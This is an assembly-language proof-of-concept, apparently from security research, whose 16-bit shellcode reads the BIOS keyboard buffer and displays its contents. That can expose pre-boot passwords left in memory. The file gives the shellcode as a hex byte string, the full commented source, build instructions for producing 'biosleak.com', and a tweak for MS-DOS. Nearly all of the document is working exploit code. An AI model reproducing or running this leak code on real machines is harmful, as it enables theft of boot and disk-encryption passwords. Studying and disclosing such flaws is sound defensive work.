;------------------- [ windows-poc.asm ] -----------------------;
;								;
;	Jonathan Brossard // [email protected]                   ;
;                            [email protected]                ;
;								;
; 16b shellcode, BIOS Api only used : aimed at being Xplatform	;
; if run under virtual or real mode...				;
;								;
; Compiling : nasm -fbin ./windows-poc.asm -o biosleak.com    	;
;---------------------------------------------------------------;

;\x30\xe4\xb0\x40\x8e\xd8\xb0\x1c\x89\xc6\x30\xed\xb1\x10\x3e\x8b
;\x04\x30\xe4\x3c\x20\x72\x04\x3c\x7e\x72\x02\xb0\x20\x83\xc6\x02
;\x56\x51\x50\xb4\x03\x30\xff\xcd\x10\xb4\x02\xfe\xc2\xcd\x10\x58
;\xb4\x0a\xb3\x06\xb1\x01\xcd\x10\x59\x5e\xe2\xd2\x30\xe4\xb0\x4c
;\xcd\x21




	org 100h 

section .text 


_start:

	xor ah,ah
	mov al,0x40				; 0x40:0x1e : keyboard buffer address
	mov ds,ax

	mov al, 0x1c
	mov si, ax
	
	xor ch,ch
	mov cl, 0x10

leakloop:
	mov ax, [ds:si]

	xor ah,ah

	cmp al, 0x20
	jb keepcopying
	cmp al, 0x7e
	jb keepcopying2

keepcopying:
	mov al, 0x20
keepcopying2:
	add si, byte +0x2			; Replace this line by add si,4
				    		; if you plan to use it under MS-Dos
						; due to imperfect emulation of 16b
						; arch under windows.

	push si
	push cx
	push ax
	mov ah, 0x03
	xor bh, bh
	int 0x10

	mov ah, 0x02
	inc dl
	int 0x10

	pop ax

	mov ah, 0ah
	mov bl, 06h
	mov cl, 0x01
	int 0x10
	pop cx
	pop si

	loop leakloop


;----- Terminate as well as we can...

	xor ah,ah
	int 0x16

	int 0x19


;EOF